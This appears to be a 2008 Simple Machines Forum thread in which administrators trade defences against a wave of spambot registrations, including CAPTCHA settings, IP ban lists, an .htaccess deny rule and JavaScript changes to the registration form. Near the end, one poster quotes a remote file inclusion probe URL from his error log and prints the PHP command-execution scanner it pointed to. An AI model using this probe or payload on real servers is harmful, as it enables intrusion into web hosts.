I did find it interesting that my board which is in Brazilian Portuguese is being attacked and have now turned the ability to select languages off, in addition to changing the captcha security level to high and making it so that administrator authorizes new users.

For what it is worth I have blocked the following IPs:

78.26.179.*     
79.143.177.*    
83.149.71.*    
84.243.196.*    
85.29.210.*    
87.118.124.*    
87.248.181.*    
88.119.247.*       
89.76.6.*    
89.76.10.*    
89.149.253.*    
92.48.201.*    
94.102.60.*
194.8.75.*    
194.146.190.*

Regards to all

Paul
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: poolhall on November 12, 2008, 01:41:28 PM
Quote from: Deprecated on November 11, 2008, 06:26:59 PM
3.) I've never seen a human registration from mail.ru

Just FYI,

this is the largest public mail service in Russian speaking serment of Internet, and I think it'd be safe to state that every third person from xUSSR has an account @mail.ru. There are easily tens of millions of human registrations from mail.ru.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 12, 2008, 01:45:04 PM
I was referring to the days when I ran an IPB forum and had hundreds of spambot registrations using mail.ru addresses. Not a single one of them was a human, because our forum evidently didn't interest Russians.

In any case, my point above was that I believe it's fruitless to try and block mail domains. Rather, you just need to make your registration hard for bots and easy for humans. All three of the recommended mod packages do that.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: palofdru on November 12, 2008, 01:46:56 PM
Quote from: poolhall on November 12, 2008, 01:41:28 PM
Quote from: Deprecated on November 11, 2008, 06:26:59 PM
3.) I've never seen a human registration from mail.ru

Just FYI,

this is the largest public mail service in Russian speaking serment of Internet, and I think it'd be safe to state that every third person from xUSSR has an account @mail.ru. There are easily tens of millions of human registrations from mail.ru.

True,  until Hotmail or Yahoo have a Russian language selection, then that will be the mail provider of choice for many Russkies and Ukrainians.

In fact, I have an @mail.ru email address, since I could see Russia from my house, I figured it would boost my Foreign Policy credentials*



* My foreign policy = get a Russian bride.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: poolhall on November 12, 2008, 02:11:57 PM
I'm running SMF Beta 4 with default CAPTCHA and user activation and having no problems with spam.

Remembering the time I was running phpBB, I would say that there is no better anti-bot protection than a custom security question. For human spammers, I used a mod allowing to set a number of posts beyond which links can be posted on the board. Using this simple "bundle", I didn't get a single spam message for a year.

@palofdru:

be carefull of viruses :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on November 12, 2008, 02:30:48 PM
I use the reCAPTCHA mod, so have not noticed any spam attacks on my sites, but now that I have read this thread, I'll be keeping more of a closer eye on my StatCounter results for my 1.1.7 sites.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: bigmo66 on November 12, 2008, 02:31:13 PM
I notched up the Captcha to high and initiated the "age" verification and so far so good.
I have 2 bots trying to register at this very second!  I'm waiting to see if they get in.....

Guest  (93.174.93.196)     01:16:55 PM     Registering for an account on the forum.

Guest (94.102.60.115)    01:15:48 PM    Registering for an account on the forum.

****Well, they WERE NOT able to register!  Good news.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: forumite on November 12, 2008, 02:42:41 PM
Quote from: bigmo66 on November 12, 2008, 02:31:13 PMI have 2 bots trying to register at this very second!

How did you know they were bots from the SMF Who's Online page?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: palofdru on November 12, 2008, 03:03:09 PM
Quote from: rvforumite on November 12, 2008, 02:42:41 PM
Quote from: bigmo66 on November 12, 2008, 02:31:13 PMI have 2 bots trying to register at this very second!

How did you know they were bots from the SMF Who's Online page?

he probably googled the IP's, or checked his logs and found that those clients only did a GET of the page and a POST but otherwise consumed no other resources like a regular user browsing would.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: ModelBoatMayhem on November 12, 2008, 03:21:48 PM
Quote from: Deprecated on November 11, 2008, 06:26:59 PM

If you have been considering upgrading to 2.0, now might be a good time to do so.


Thanks for all your help and advice Deprecated, much appreciated.Are you recommending we install SMF 2.0 Beta 4 Public before the final on our live sites?Martin - England.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: lax.slash on November 12, 2008, 03:35:59 PM
We should sticky this thread...
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 12, 2008, 03:41:55 PM
Actually I started it out sticky, and it flew right to the top line where nobody would ever see it. (IMO) If I hadn't written it myself I'm sure I wouldn't notice it. :)

People tend to ignore sticky posts unless there's only one of them.

I think it will float around near the top as long as there are still people who are being swamped by spambots.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: bigmo66 on November 12, 2008, 03:58:11 PM
Quote from: rvforumite on November 12, 2008, 02:42:41 PM
Quote from: bigmo66 on November 12, 2008, 02:31:13 PMI have 2 bots trying to register at this very second!

How did you know they were bots from the SMF Who's Online page?


Yeah, I traced the IPs and they matched the same other 70+ buttheads trying to get in. The emails were also similar. Lots of joyyee.com  emails.  Russia, Amsterdam.  So far the elevated Captcha is working. if it fails, then I'll mod it!
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: forumite on November 12, 2008, 04:58:14 PM
QuoteI traced the IPs and they matched the same other 70+ buttheads trying to get in.

Ah, OK, thanks. Thought you had some method I wasn't aware of.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Jdanniel on November 12, 2008, 05:07:50 PM
I've been getting hit also.  I have a small, not-widely-used board, but I take pride in its integrity.

I switch to Admin Approval, and set the visual verification thingy to high. 

I stopped bothering with the Ban list because that's an exercise in futility. 

What I'm wondering now is whether or not to set an age limit, as well.

Any suggestions on what age I should limit?  Thanks!  Jd
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 12, 2008, 05:18:00 PM
Quote from: Jdanniel on November 12, 2008, 05:07:50 PM
I stopped bothering with the Ban list because that's an exercise in futility. 

My point exactly. Whack-a-Mole.

I don't think it matters what age you set it at. The bots are evidently too stupid to check it no matter what age it asks about. Set it at 18... or 13... or even 1. :) It would be a good experiment. :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Dgui on November 12, 2008, 06:21:03 PM
We're running 1.1.2, yea, I know it's well past the time to update but we have made extensive code changes and get nervous even thinking "update".  Anyway, we're going to swallow hard, grit our teeth and update to 1.1.7.

In the meantime, can we use any of the three above listed mods with 1.1.2?

We implemented Member Activation to stop the bad guys and then added Age Restriction and set CAPTCHA to high.  We watch the spammers try to register (Who's Online) but they don't seem to get past the CAPTCHA  / Age Restriction.

Still would like to install one of the mods if compatible with 1.1.2.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 12, 2008, 06:39:29 PM
Well I have an answer you won't like to hear.

All three mods start at SMF 1.1.4. However I suspect they would work fine with 1.1.2. BUT... If they don't work right and they screw up your forum you will find yourself upgrading to 1.1.7 tonight! :o

I don't have any 1.1.2 test forum or I'd test it for you, so unless you want to be the guinea pig, and bet your life on it working, I'd say it might not be a very good idea.

As long as you are not being inundated by spambots with your current settings you should just sit tight. If you find even one spambot gets through, go to manual Member Approval and verify human/bot manually.

Come on back and post again if your situation changes. :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Dgui on November 12, 2008, 06:53:01 PM
Thanks Deprecated.

Right now I'm "belt and suspenders" with Member Approval AND the CAPTCHA / Age Restriction.  We were hit by about 50 bots in 24 hours and it woke us up.

Don't want to update tonight but gonna get it done by this weekend.   :)

Again, thanks for the great read and your input.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Muldoon on November 12, 2008, 07:01:13 PM
well activation approval on my site has worked.   However, as some have said increasing the visual verificaiton image from medium to high has worked, I have just implemented that and put it back on member activation...so we'll see if this method works for me.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: lax.slash on November 12, 2008, 07:30:27 PM
WAIT! I HAVE AN IDEA! What if someone writes a mod that searches EVERY new post for members with less than x posts (changable by admin) for keywords that are frequently used in SPAM, like Viagara, and such, and for each word, have a "threat level" settable by the admin (High, Medium, Low) and each level has a different % weight (again settable by the admin) where words or phrases rated HIGH such as Viagara count as 15%, MEDIUM words/phrases such as "limited time only" count as 10%, and LOW words and phrases, such as Free count as 5%? Then when a post reaches a certain percent settable by the admin it either deletes the post automatically, or directs the post to an admin/moderator for approval?

It might not be the easiest thing in the world to program, but I'm sure it would be well worth the effort, AND it would be a great permanent fix for all SPAM! Only roadblocks are misspellings that bots could use, and if the bot splits up the words, such as FR RE (Re: is the beginning of subjects sometimes), or VIA GRA (the word via). Just my idea, though! :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: lax.slash on November 12, 2008, 07:46:25 PM
Rough copy at link:

http://img515.imageshack.us/my.php?image=spamcoptf3.png (http://img515.imageshack.us/my.php?image=spamcoptf3.png)

Go ahead and laugh   lol    I know I suck with MS Paint  :P
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on November 12, 2008, 07:59:40 PM
Considering all the wonderful permutations that spammers can do (seen e-mail spam lately?), it isn't really feasible to maintain such a list, and would be a huge drag on performance to do that kind of scanning.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: bugstomper on November 12, 2008, 08:46:21 PM
My forum got hit too, but I implemented a very simple change that stopped the bots completely at the expense of requiring users to be running Javascript in order to register. The nice thing about what I did is that it does not require the user to answer any challenge or do anything special as long as they have Javascript enabled.

By the way, my forum is on a shared server at an ISP and I am able to see the raw access logs for all the different web sites on the server. I grepped for the ip addresses that were hitting me and found that the very same ones were hitting on forums running other software than SMF, including at least VBulletin, PHPBB, and YaBB. It looks like this wave of bots is either one massive distributed attack or else someone released a general multi-forum software bot script and a lot of script-kiddies are running amok with them. I could see from the acess logs that these bots were able to blast through the CAPTCHAs on my site in no more than one second but were stopped by even the simplest question/answer human test on any of the forum software.

I haven't set this up as a mod, but perhaps someone who is into mods can write one up. The changes are only in Themes/default/Register.template.php and what they do is change the registration form so that it doesn't work and use Javascript to make it right. A spambot, which doesn't execute javascript, will never see the proper form. If in the future spambots start including the ability to run javascript, then it will make the job of blocking them even easier, as you can the include simple "are you human" tests in the javascript and make the bots run javascript code that takes forever. So I think it unlikely that the bot writers will bother with that.

The changes: where it says <form action="', $scripturl, '?action=register2"  to
<form action="http://example.com/antispambot.php?action=register2" style="display:none"

If you actually say "example.com" which is a domain name that is reserved to use as an example and is guaranteed to never exist, then the spambots will waste time posting there and not bother anyone. If instead you use your own web server name and a non-existent URL like "antispambot.php", then you can track in your web server access logs the spambots fruitless attempts at posting.

The display:none style makes the form invisible in a browser, so people not running Javascript will not be confused by a form that doesn't work.

In addition, to make sure that the spambot never sees the CAPTCHA image, remove the CAPTCHA image URLS a bit later in the same form by changing the IMG tags to look like

<img src="" alt="', $txt['visual_verification_description']

and

<img src="" alt="', $txt['visual_verification_description'],

That is, just change the src= parts to say simply ""

At the end of the form, will insert some Javascript that makes it all right again:

        echo '
<script language="JavaScript" type="text/javascript"><!-- // --><![CDATA[
        document.forms.creator.style.display = "block";
        document.forms.creator.action = "' . $scripturl, '?action=register2";
        refreshImages();
// ]]></script>
<noscript>
<h2>This form requires Javascript to be enabled in your browser for this
site</h2>
</noscript>';

That's it! I could see in my web server access logs spambots doing a GET of the registration page and then a POST to the bogus action URL that the form is initialized with. Not one ran the Javascript to get the correct form information.

I can think of one enhancement to this if the bots get more clever and start using the unmodified form from Register.template.php instead of reading my modified one. Add a hidden text field to the form, for example named sekret_field, and in code that checks the CAPTCHA authentication, verify that the sekret_field contains some secret string. You can even generate the string the same as the CAPTCHA string and put it in  session variable the same way. In the Javascript code, fill in that hidden field with the correct value, using a Javascript expression so that the value does not appear in complete form anywhere for the bot to read it simply. For example

document.getElementById("sekret_field").value = "This is " + "the sekret";

If anyone wants to make this into a mod and wants any more detailed code example. send me a PM and I'll help out.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: palofdru on November 12, 2008, 08:56:43 PM
actually, you can keep out 95% of auto spammers with 3 lines of code   total.

Add a SAVE THIS POST? or THIS IS NOT SPAM! checkbox to the form, and the check for that checkbox being selected before you accept the  post.

Use a cookie to save and restore the value for subsequent posts, or force the user to affirmatively click "NOT SPAM!" each time (feel free to change "Not Spam!" to something else :)

SMF has a provision where it checks to see if a new post has been added while you were typing yours, I would insert my check for the 'I AM NOT SPAM' checkbox there, that way I can have it loop back to have you (as a human) click that checkbox

update,lol... bugstomper posted while I was typing!

I would add bugstomper's code to have his javascript 'click that checkbox' then HIDE IT (bots dont run javascript)

Humans not running Javascript would see the prompt to click the checkbox (that way it would work even if posting from a cell phone, which SMF supports)

Fully bio-degradable, like a SMF Bran Muffin!
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on November 12, 2008, 08:59:03 PM
Someone please do a trace on these spam bots.
Let me know if the name InternetServiceTeam shows up in anyone's logs.

These are 2 of the IP/Hostnames they have:
89-149-209-68.internetserviceteam.com
89-149-226-58.internetserviceteam.com


They Offer these services (you can get to their site through hidden TOR connections):
Professional Hacking
Web Scraping
Spam Distribution
Dedicated Spam Botnets
(and some more).

The InternetServiceTeam used to be Web Hosting, but they merged with netdirekt.de. Have no idea who still controls the Domain.

I have reason to believe that InternetServiceTeam is actually part of the netdirekt.de team. That would explain the wide IP range they have. Yet, according to sources, netdirekt.de is a legit, decent ISP, so the way I figure, it's not the whole group, just some that are inside the ISP's business.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: palofdru on November 12, 2008, 09:17:11 PM
who cares?

## Spammer
deny from .internetserviceteam.com

Just add the above to your .htaccess :P
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on November 12, 2008, 09:21:27 PM
I care, or I would not have asked.
There are reasons I ask for info of this group on people's logs.
I personally prevented this group from taking down 2 support forums for Free Web Hosts.
FreeWeb7.net and Byet.net
Both are VB forums. After the attempts at attacking the forums, with HUMANS not just bots, they then proceeded to attack the servers that hosted the forums, with DDoS attacks.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Looking on November 12, 2008, 09:23:25 PM
If you can, the best thing to do is code in your own unique questions in the register form that only a human could answer. To me the others can still be answered by a bot.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: asonnenshine on November 12, 2008, 09:24:55 PM
Thanks for the info.

I was running SMF 1.1.2 and started to get spam couple days ago.  I thought I had already fixed that problem by installing CAPTCHA about 6 months prior. In my forum, only registered members can post, so it seems this spam was from registered users? What?

This morning I updated to SMF 1.1.7 and was still getting spam! I thought maybe it was just my website, but then I did a search and found this post...thanks again, I'll try upgrading to 2.0.

Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on November 12, 2008, 09:26:31 PM
Like I said, if it is IST, then not all are bots. They love using real people to simulate bots.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Paul Cull on November 12, 2008, 09:35:07 PM
the internetserviceteam domain was used by the bot to post to my forum, using the user name levitraonline. ip address of  89.149.253.223 and an email address at @searchengineshome.org
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on November 12, 2008, 09:41:56 PM
Thanks Paul. That confirms me that they are indeed behind this forum war.
My sources say that InternetServiceTeam likes to play with forums for some twisted reason.

However, they wont stop there. Their primary function is to DDoS servers and hack sites/forums.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 12, 2008, 10:02:01 PM
Quote from: Looking on November 12, 2008, 09:23:25 PM
If you can, the best thing to do is code in your own unique questions in the register form that only a human could answer. To me the others can still be answered by a bot.

That is why 2.0 is so good. Every forum operator can pick different questions.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: wmcintosh on November 12, 2008, 10:13:23 PM
What I am doing http://www.wmcintosh.com/forum/index.php?action=register (may reword error message later).

At least till 2 is out of beta, and no RC's, and yes I am stubborn.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on November 12, 2008, 10:16:52 PM
Quote from: wmcintosh on November 12, 2008, 10:13:23 PM
What I am doing http://www.wmcintosh.com/forum/index.php?action=register (may reword error message later).

At least till 2 is out of beta, and no RC's, and yes I am stubborn.

That's good idea... Post your email address there for the spam bots and all to see.
You may want to change that. Maybe write it out like:

name [at] address.ext

People will know how to make it work.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: wmcintosh on November 12, 2008, 10:22:38 PM
@BurkeKnight, I always post it like that, in over a year, never had spam, yet, actually I have another way to do it, before said spam bots make a liar out of me.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on November 12, 2008, 10:25:55 PM
Quote from: wmcintosh on November 12, 2008, 10:22:38 PM
@BurkeKnight, I always post it like that, in over a year, never had spam, yet, actually I have another way to do it, before said spam bots make a liar out of me.

I can only say one thing about that... ROFL!!!!
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: StanJ on November 12, 2008, 10:55:40 PM
I see the fixes for the English forums, anything for the Spanish?  I have a spanish forum, but do not speak that..

Thanks

Stan
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: palofdru on November 12, 2008, 11:03:37 PM
Quote from: BurkeKnight on November 12, 2008, 10:25:55 PM
Quote from: wmcintosh on November 12, 2008, 10:22:38 PM
@BurkeKnight, I always post it like that, in over a year, never had spam, yet, actually I have another way to do it, before said spam bots make a liar out of me.

I can only say one thing about that... ROFL!!!!

^ of course, he probably *welcomes* those helpful emails offering 'penis enlargement' and thus wouldnt call it spam.....
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: ArrayInteractive on November 13, 2008, 12:02:11 AM
Hey Folks,

Another victim of the spamming here... I'm running 1.1.4.

I knew I was making a good choice when I went with SMF. I get nailed with this spam problem, come here expecting to be the only one. But much to my surprise you guys are all over it and offering lots of solutions! Big thanks everyone!

I've increased my Captcha complexity, forced the minimum age, and installed the are you Human mod. I hope that's enough to do the trick. Automated install of the reCaptcha mode failed testing in the Register.template.php file, and I don't really have time to muck about with it manually. Hopefully those other changes do the trick...

Has anyone tried the javascript hacks to the reg form that were mentioned back a page or two? Sounds like that would do the trick as well...

Thanks again!

So much for my idealistic world of no spammers, where I could actually increase my postings by allowing guests to make posts... :(
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 13, 2008, 12:10:32 AM
Quote from: BurkeKnight on November 12, 2008, 10:25:55 PM
Quote from: wmcintosh on November 12, 2008, 10:22:38 PM
@BurkeKnight, I always post it like that, in over a year, never had spam, yet, actually I have another way to do it, before said spam bots make a liar out of me.

I can only say one thing about that... ROFL!!!!

I agree with Burke. You should post username (at) domain (dot) extension

If you get spammed don't mind Burke or me for warning you.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 13, 2008, 12:14:49 AM
Quote from: StanJ on November 12, 2008, 10:55:40 PM
I see the fixes for the English forums, anything for the Spanish?  I have a spanish forum, but do not speak that..

Thanks

Stan

Stan,

La solución en Español está igual que en Inglés. :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: wmcintosh on November 13, 2008, 12:35:25 AM
Changed my register page.

@palofdru, why would you say that, never received those.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: palofdru on November 13, 2008, 01:23:48 AM
y'all may take some small satisfaction.......

http://www.washingtonpost.com/wp-dyn/content/article/2008/11/12/AR2008111202662.html


I think this shows the importance of REPORTING these attacks and complaining to high heaven, both directly to the host (which was actually the evil partner and would probably ignore you) AND ALSO TO THEIR UPSTREAM PROVIDER AND/OR FBI!

They can claim fair harbor provisions blah blah blah blah...but once they have enough notification from enough people THEY HAVE TO ACT (this is not a legal issue) all the big ISP, Co-locators and even little webhosters have Tos (terms of service) that allow them to drop customers like a hot potato if they (customers) get too hot.

All you are really doing by complaining loudly, is forcing them to enforce their own TOS

yay another one bites the DOS! *


* get the pun? since many of these spammers engage in DOS (Denial of Service attacks and now THEY have been "Denied Service"! -also wordplay because "DOS" sounds like DUST,as in 'bytes the dust'..... oh never mind.....
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: mprayii on November 13, 2008, 06:13:22 AM
I run a few forums and was getting spam on 1.1.6. So I upgraded to 1.1.7 and was still getting spam accounts.

Next:

I installed the "Are you Human" mod and thought that worked, but not a day later I had a spam account created on one of my sites - dripshids - from netherlands.

I guess I will try an additional mod.

Can anyone recommend reCaptcha or the Anti-bot puzzles? My comunities consist of older people - and those that may not know how to add and subtract, haha. So I am trying to keep this as dumb as possible.

Thanks.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: bbulldog on November 13, 2008, 06:56:02 AM
reCaptcha is good, installed it a couple of days ago and no more spam accounts.

many thanks here to all, as always a great job.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: MadMax201 on November 13, 2008, 07:02:22 AM
Hi there,

i dont know if it was already mentioned :
my workaround to stop those spam-bots is to apend a suffix like "_dummy" to the user / email field on the Register.template.php form.
you have also to modify the document.forms.creator.regSubmit.disabled line and the Register.php around line 292

With this my smf 1.1.7 is spam-free for now.


regards Mike
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: ModelBoatMayhem on November 13, 2008, 08:11:38 AM
Quote from: Deprecated on November 11, 2008, 06:26:59 PM
If you have been considering upgrading to 2.0, now might be a good time to do so.

1.Thanks for all your help and advice Deprecated, much appreciated.
Are you recommending we install SMF 2.0 Beta 4 Public before the final on our live sites?

2. Also do any of the security mods work on all themes?

Martin - England (SMF 1.1.7 - attacks a day currently.)

Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Paul Cull on November 13, 2008, 08:50:44 AM
Just an observation: I have been banning the IPs of the bots, and notice that, although I haven't had any new signups since I upped the captcha level and added age verification, I am still getting visited from a few of these IP addresses.

All of these got my "you have been banned" message this morning, which make me think that there is a limited number of IP ranges from which these attacks are orginating, and that for some strange reason, the bot reguarly comes back to my forum to try its luck again.

08:11:01 IP 84.19.176.2
08:10:59 IP 84.19.176.2      
08:10:52 IP 194.165.42.109      
08:10:51 IP 194.165.42.109      
06:50:22 IP 194.165.42.67      
06:50:21 IP 194.165.42.67      
06:31:09 IP 194.165.42.91      
06:31:08 IP 194.165.42.91      
05:27:37 IP 88.119.247.27      
05:27:19 IP 88.119.247.27      
03:33:04 IP 194.165.42.27      
03:32:42 IP 194.165.42.27      
01:35:58 IP 194.8.75.214      
01:35:55 IP 194.8.75.214      

Weird stuff eh

Paul
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: bigmo66 on November 13, 2008, 09:18:33 AM
It's been about 24 hours and at least 100 tries have been made to register bogus accounts to my forum and not one has got past the increased Captcha & age verification.  Will they "learn" or is this possibly good enough?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 13, 2008, 09:29:24 AM
mprayii- Just try them and see. Install one, test it yourself. If you like it, keep it. If not, uninstall it and install a different one.

That's the first report that the "Are You Human?" mod failed. First I've seen anyway.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 13, 2008, 09:37:35 AM
Quote from: ModelBoatMayhem on November 13, 2008, 08:11:38 AM
Quote from: Deprecated on November 11, 2008, 06:26:59 PM
If you have been considering upgrading to 2.0, now might be a good time to do so.

1.Thanks for all your help and advice Deprecated, much appreciated.
Are you recommending we install SMF 2.0 Beta 4 Public before the final on our live sites?

2. Also do any of the security mods work on all themes?

Martin - England (SMF 1.1.7 - attacks a day currently.)

Whether to install 2.0 is a difficult decision for most. Fewer themes are available, and in some cases your mods may not be available in 2.0 versions. TinyPortal isn't compatible yet, although Simple Portal is a good alternative and is 2.0 compatible.

I have all my own sites on 2.0 Beta 4, but I don't think it's time for everybody to switch up, even though I wish they would just because it would be easier if we didn't have to support 1.x. There are several 2.0 features well worth the upgrade, not the least of which is improved security and anti-bot protection. The PM system is much, much, much improved! (I really like it.) Mod writers like 2.0 because in some cases it's easier and cleaner to write mods for 2.0. Finally, there are some appearance issues and at least one bug that needs fixing, although the solution is easy and well known (totalMembers bug).

It's up to each person to decide if or when to upgrade to 2.0. There is no guarantee that the spambot attacks won't spread to 2.0, although we are well prepared, including the three mods in the OP.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 13, 2008, 09:39:23 AM
Quote from: bigmo66 on November 13, 2008, 09:18:33 AM
It's been about 24 hours and at least 100 tries have been made to register bogus accounts to my forum and not one has got past the increased Captcha & age verification.  Will they "learn" or is this possibly good enough?

Bots don't learn, but their botmasters might decide to reprogram them.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: ethankcvds on November 13, 2008, 09:50:58 AM
Well I'm not taking any chances I'm adding questions and the reCAPTCHA mod to my SMF 2.0  beta 4. I'm also running SMF 1.1.7 but its an  invite only site so I would like to see them register to that site.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: zigzag on November 13, 2008, 10:05:43 AM
QuoteThat's the first report that the "Are You Human?" mod failed. First I've seen anyway.

I've only had one pass through the Are you human mod but the ip was from Lagos and I think that the registration might have been processed by a human rather than bot.

All the other ip's that made it through before I installed the mod were from Saudi, Ukraine and Germany and the same bots are still trying to sign up but so far none have got past.

As well as the mod I have the SMF capture set too medium.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Muldoon on November 13, 2008, 10:52:09 AM
Well stepping up the visual verification image from medium to high has stopped the bots in their tracks for my site...not one registration from them after implementing this step!  8)  Thank you for the guidance.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Pere Escobar Solsona on November 13, 2008, 12:31:17 PM
For opened forums (where guests can post messages) I tried the Advanced Visual Verification MOD and, when installed, it works fine (no more spam messages); the installation fails on my 1.1.7 forum, but the solution isn't so difficult...
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on November 13, 2008, 12:40:41 PM
I just had a strange error pop up, which may or may not be related:

Guest
Today at 10:48:15 AM
IP address 195.12.53.176
Type of error: User
Error 404 - Not Found (http://www.bksmf.com//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.geocities.com/dianavirsana/test.txt???)

I was able to check out that test.txt file, and I cannot figure out what this person is up to.

<html><head><title>/\/\/\ Response CMD /\/\/\</title></head><body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo(
"Safe Mode of this Server is : ");
echo(
"SafemodeOFF");
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@
eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo(
"Safe Mode of this Server is : ");
echo(
"SafemodeOFF");
}else{
echo(
"Safe Mode of this Server is : ");
echo(
"SafemodeON");
}
}
function 
ex($cfe){
$res '';
if (!empty(
$cfe)){
if(
function_exists('exec')){
@
exec($cfe,$res);
$res join("\n",$res);
}
elseif(
function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(
function_exists('system')){
@
ob_start();
@
system($cfe);
$res = @ob_get_contents();
@
ob_end_clean();
}
elseif(
function_exists('passthru')){
@
ob_start();
@
passthru($cfe);
$res = @ob_get_contents();
@
ob_end_clean();
}
elseif(@
is_resource($f = @popen($cfe,"r"))){
$res "";
while(!@
feof($f)) { $res .= @fread($f,1024); }
@
pclose($f);
}
}
return 
$res;
}
exit;
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 13, 2008, 01:26:59 PM
Get a good anti-virus anti-trojan program too. You'll need it.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on November 13, 2008, 01:29:19 PM
Quote from: Deprecated on November 13, 2008, 01:26:59 PM
Get a good anti-virus anti-trojan program too. You'll need it.

I have one, but the snoop only seems to be scanning sites, looking for installation setup.
However, the Apache Error mod sent him to a 404 not found error... :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: wagtail on November 13, 2008, 03:15:08 PM
They are spamming my cms and smf forum in equal measure.
So this definitely isn't smf specific.

stopforumspam_dot_com is also listing a lot of spammers over the last few days.

At the moment I am resorting to banning the IP ranges from my sites.
My error pages are full with failed attempts (as well as a few still getting through).

Most IPs appear to be from Eastern European servers.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: lax.slash on November 13, 2008, 03:18:21 PM
Has anyone had users report SPAM through PM systems?

And isn't there some website that you can hook up your forum to, and they somehow check to see if the user is a bot? Can't remember the site.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: forumite on November 13, 2008, 03:41:45 PM
